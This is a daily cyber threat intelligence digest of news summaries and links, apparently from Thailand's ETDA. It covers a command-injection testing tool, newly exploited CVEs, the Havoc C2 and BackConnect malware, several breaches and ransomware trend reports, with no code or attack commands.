Cyber Threat Intelligence 04 March 2025
-
New Tooling
- Commix: Open-Source OS Command Injection Exploitation Tool
"Commix is an open-source penetration testing tool designed to automate the detection and exploitation of command injection vulnerabilities, streamlining security assessments for researchers and ethical hackers."
https://www.helpnetsecurity.com/2025/03/03/commix-open-source-os-command-injection-exploitation-tool/
https://github.com/commixproject/commix
Vulnerabilities
- CISA Adds Five Known Exploited Vulnerabilities To Catalog
"CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
CVE-2023-20118 Cisco Small Business RV Series Routers Command Injection Vulnerability
CVE-2022-43939 Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability
CVE-2022-43769 Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
CVE-2018-8639 Microsoft Windows Win32k Improper Resource Shutdown or Release Vulnerability
CVE-2024-4885 Progress WhatsUp Gold Path Traversal Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/03/03/cisa-adds-five-known-exploited-vulnerabilities-catalog
https://www.bleepingcomputer.com/news/security/cisa-tags-windows-and-cisco-vulnerabilities-as-actively-exploited/
<https://securityaffairs.com/174853/security/u-s-cisa-adds-multiple-cisco-small-business-rv-series-* routers-hitachi-vantara-pentaho-ba-server-microsoft-windows-win32k-and-progress-whatsup-gold-flaws-to-its-known-exploited-vulnerabilities.html>
Android Security Update Contains 2 Actively Exploited Vulnerabilities
"Google addressed 43 vulnerabilities affecting Android devices in its March security update, including a pair of software defects reportedly under active exploitation. Google said the two vulnerabilities — CVE-2024-43093 and CVE-2024-50302 — “may be under limited, targeted exploitation.”"
https://cyberscoop.com/android-security-update-march-2025/
Malware
- Havoc: SharePoint With Microsoft Graph API Turns Into FUD C2
"Havoc is a powerful command-and-control (C2) framework. Like other well-known C2 frameworks, such as Cobalt Strike, Silver, and Winos4.0, Havoc has been used in threat campaigns to gain full control over the target. Additionally, It is open-source and available on GitHub, making it easier for threat actors to modify it to evade detection."
https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
https://www.bleepingcomputer.com/news/security/new-clickfix-attack-deploys-havoc-c2-via-microsoft-sharepoint/
https://thehackernews.com/2025/03/hackers-use-clickfix-trick-to-deploy.html
https://www.darkreading.com/cyberattacks-data-breaches/phishers-wreak-havoc-disguising-attack-inside-sharepoint
https://hackread.com/malware-exploits-microsoft-graph-api-infect-windows/
https://www.infosecurity-magazine.com/news/phishing-campaign-havoc-framework/ - Black Basta And Cactus Ransomware Groups Add BackConnect Malware To Their Arsenal
"The Trend MicroManaged XDR and Incident Response (IR) teams recently analyzed incidents where threat actors deploying Black Basta and Cactus ransomware used the same BackConnect malware to strengthen their foothold on compromised machines. The BackConnect malware is a tool that cybercriminals use to establish and maintain persistent control over compromised systems. Once infiltrated, it grants attackers a wide range of remote control capabilities, allowing them to execute commands on the infected machine. This enables them to steal sensitive data, such as login credentials, financial information, and personal files."
https://www.trendmicro.com/en_us/research/25/b/black-basta-cactus-ransomware-backconnect.html
https://hackread.com/fake-it-support-calls-microsoft-teams-users-install-ransomware/
https://www.infosecurity-magazine.com/news/attackers-exploit-microsoft-teams/ - Mobile Malware Evolution In 2024
"These statistics are based on detection alerts from Kaspersky products, collected from users who consented to provide statistical data to Kaspersky Security Network. The statistics for previous years may differ from earlier publications due to a data and methodology revision implemented in 2024."
https://securelist.com/mobile-threat-report-2024/115494/ - Russian Telecom Beeline Facing Outages After Cyberattack
"Some Russians had their internet disrupted on Monday due to a targeted distributed denial-of-service (DDoS) attack on the telecom Beeline — the second major attack on the Moscow-based company in recent weeks. Beeline confirmed the attack to local media following reports from several outage-tracking services and user complaints. The provider has more than 44 million subscribers."
https://therecord.media/russian-telecom-beeline-outages-cyber - Uncovering .NET Malware Obfuscated By Encryption And Virtualization
"This article examines obfuscation techniques used in popular malware families, and offers some insights into possible opportunities for automating unpacking of these malware samples. We will examine these behaviors in samples we have observed, showing how to extract their configuration parameters through unpacking each stage. Performing this same process through automation would allow a sandbox performing static analysis to extract crucial malware configuration parameters from such samples."
https://unit42.paloaltonetworks.com/malware-obfuscation-techniques/
Breaches/Hacks/Leaks
- Rubrik Rotates Authentication Keys After Log Server Breach
"Rubrik disclosed last month that one of its servers hosting log files was breached, causing the company to rotate potentially leaked authentication keys. The company has confirmed to BleepingComputer that the breach was not a ransomware incident and that it did not receive any communication from the threat actor."
https://www.bleepingcomputer.com/news/security/rubrik-rotates-authentication-keys-after-log-server-breach/ - Indian Stock Broker Angel One Discloses Data Breach
"Indian stock brokerage firm Angel One on Friday disclosed a data breach impacting client information stored in its Amazon Web Services (AWS) account. The incident, the company said, was discovered after it received an email alert from a ‘dark web monitoring partner’ on February 27, regarding a ‘data leakage post’. “After analyzing the post, it was ascertained that some of Angel One’s AWS resources were compromised,” the company said."
https://www.securityweek.com/indian-stock-broker-angel-one-discloses-data-breach/ - Palau Health Ministry On The Mend After Qilin Ransomware Attack
"The health ministry of the Pacific island nation of Palau has recovered from a ransomware attack launched by a gang known for targeting prominent healthcare institutions. Palau officials told Recorded Future News that the February 17 ransomware attack launched by hackers connected to a group named Qilin allowed the infiltrators to steal files from IT systems used by the Ministry of Health and Human Services (MHHS). The ministry runs Belau National Hospital, an 80-bed facility that serves the country’s nearly 20,000 residents spread across hundreds of islands."
https://therecord.media/palau-health-ministry-ransomware-recover - Several Local Governments Struggling With Cyberattacks Limiting Services
"Government services offered by one of the largest counties in Maryland are still being limited more than a week after it was targeted by a cyberattack. Anne Arundel County, home to nearly 600,000 people and the state capital of Annapolis, first announced the incident on February 23 and as of Monday is warning residents that multiple services are still down."
https://therecord.media/local-govs-cyberattacks-limiting-services - Polish Space Agency Investigates Cyberattack On Its Systems
"Poland’s space agency (POLSA) announced on Sunday it had suffered a cyberattack and is currently investigating the incident. In response to the attack, the agency said it disconnected its network from the internet, and as of Monday its website remained inaccessible. Poland’s digital minister, Krzysztof Gawkowski, confirmed that state cybersecurity services had detected unauthorized access to POLSA’s IT infrastructure and had secured the affected systems. Cyber specialists are now working to identify the attackers behind the breach, he added."
https://therecord.media/poland-space-cyberattack-agency-investigate
https://www.theregister.com/2025/03/03/polish_space_agency_confirms_cyberattack/
General News
- Unmasking Hacktivist Groups: A Modern Approach To Attribution
"Hacktivism has evolved from grassroots digital protests to sophisticated, state-sponsored cyber operations. Check Point Research analyzed 20,000 messages from 35 hacktivist accounts using machine learning and linguistic analysis to reveal hidden connections and operational patterns. The research highlights how geopolitical events drive hacktivist activities, with groups resurfacing during crises to conduct targeted attacks. Stylometric analysis revealed clusters of hacktivist groups with overlapping linguistic fingerprints, indicating shared operators. For example, Cyber Army of Russia Reborn, Solntsepek, and XakNet form one such cluster. Understanding these operations helps improve cyber threat attribution, providing valuable insights into the evolving hacktivism landscape."
https://blog.checkpoint.com/research/unmasking-hacktivist-groups-a-modern-approach-to-attribution/ - SR-029.022025: MyCERT Report - Cyber Incident Quarterly Summary Report - Q4 2024
"The Cyber Incident Quarterly Summary Report Q4 2024 provides an overview of computer security incidents handled by the Cyber999 Incident Response Centre of CyberSecurity Malaysia in Q4 2024. This quarterly Cyber Incident Report also highlights statistics of incidents dealt with by Cyber999 Incident Response Centre in Q4 2024 according to their categories and security alerts and advisories released in this quarter. It should be noted that the statistics provided in this report reflect only the total number of incidents reported and handled by the Cyber999 Incident Response Centre, excluding elements such as monetary value or aftermaths of the incidents. Computer security incidents dealt with by the Cyber999 Incident Response Centre involved IP addresses and domains from Malaysia."
https://www.mycert.org.my/portal/advisory?id=SR-029.022025 - Latin American Orgs Face 40% More Attacks Than Global Average
"Cyber threats are accelerating faster in Latin America than anywhere else in the world. The trend has been building for at least a year now, actually. Last summer, Check Point tracked a 53% year-over-year rise in weekly cyberattacks against organizations in the region, followed at a distance by Africa (37%) and Europe (35%). Today, the cybersecurity company reports, Latin American companies suffer 2,569 attacks per week on average — nearly 40% more than the global average of 1,848."
https://www.darkreading.com/cybersecurity-analytics/latin-american-orgs-more-cyberattacks-global-average - Third-Party Risk Top Cybersecurity Claims
"Just because your company has locked down its security does not mean it will avoid losses. That's the lesson from recently-released cyber-insurance data that shows that ransomware costs are increasingly due to compromises at third-party providers and vendors — organizations whose security is not controlled by the businesses eventually impacted by those events."
https://www.darkreading.com/cyber-risk/third-party-risk-top-cybersecurity-claims - Online Crime-As-a-Service Skyrockets With 24,000 Users Selling Attack Tools
"The growth of AI-based technology has introduced new challenges, making remote identity verification systems more vulnerable to attacks, according to iProov. Innovative and easily accessible tools have allowed threat actors to become more sophisticated overnight, powering an increasing number of threat vectors due to new methodologies."
https://www.helpnetsecurity.com/2025/03/03/remote-identity-verification-attacks/ - How QR Code Attacks Work And How To Protect Yourself
"QR codes have become an integral part of our everyday life due to their simplicity. While they’ve been around for many years, their use exploded during the COVID-19 pandemic, when businesses turned to them for contactless menus, payments, and check-ins. While QR codes are convenient, they also present significant risks. In the past few years, cybercriminals have increasingly turned to these codes as a tool to carry out scams."
https://www.helpnetsecurity.com/2025/03/03/qr-code-attacks/ - Living Off The Land: How Threat Actors Use Your System To Steal Your Data
"Almost every advanced threat actor has added Living off the Land (LotL) techniques into their attacks. LotL is an attack strategy where threat actors conduct malicious activities by exploiting legitimate tools and features already present in a target. The phrase "living off the land" means surviving on resources you find in an existing environment. If the environment is a physical ecosystem like a forest, it means sustaining yourself on what you can forage, grow, etc. If the environment is a digital network, it means conducting an attack with the binaries, scripts, and other tools that are already at work in the victim’s digital environment. The term was applied to these techniques in 2013."
https://blog.barracuda.com/2025/03/03/living-off-the-land--how-threat-actors-use-your-system-to-steal- - The New Ransomware Groups Shaking Up 2025
"In 2024, global ransomware attacks hit 5,414, an 11% increase from 2023. After a slow start, attacks spiked in Q2 and surged in Q4, with 1,827 incidents (33% of the year's total). Law enforcement actions against major groups like LockBit caused fragmentation, leading to more competition and a rise in smaller gangs. The number of active ransomware groups jumped 40%, from 68 in 2023 to 95 in 2024."
https://thehackernews.com/2025/03/the-new-ransomware-groups-shaking-up.html
https://l.cyberint.com/ransomware-recap-2024 - Threat Report H2 2024: Infostealer Shakeup, New Attack Vector For Mobile, And Nomani
"Sometimes, our telemetry data seems like the waters of a calm bay, with small, smooth waves gently rocking the ships anchored there to sleep. Other times, however, strong winds come and change everything, bringing towering waves and scattering the ships all over the place, transforming the terrain of the bay itself in the process. ESET Threat Report H2 2024 felt a bit like that. Leading malware families were taken down by law enforcement; mobile devices saw the birth of a new, potentially very attractive, attack vector targeting both iOS and Android; there was yet another criminal “crypto gold rush”; and deepfake scams flooded social media."
https://www.welivesecurity.com/en/podcasts/threat-report-h2-2024-infostealer-shakeup-new-attack-vector-mobile-nomani/
อ้างอิง
Electronic Transactions Development Agency(ETDA) - Commix: Open-Source OS Command Injection Exploitation Tool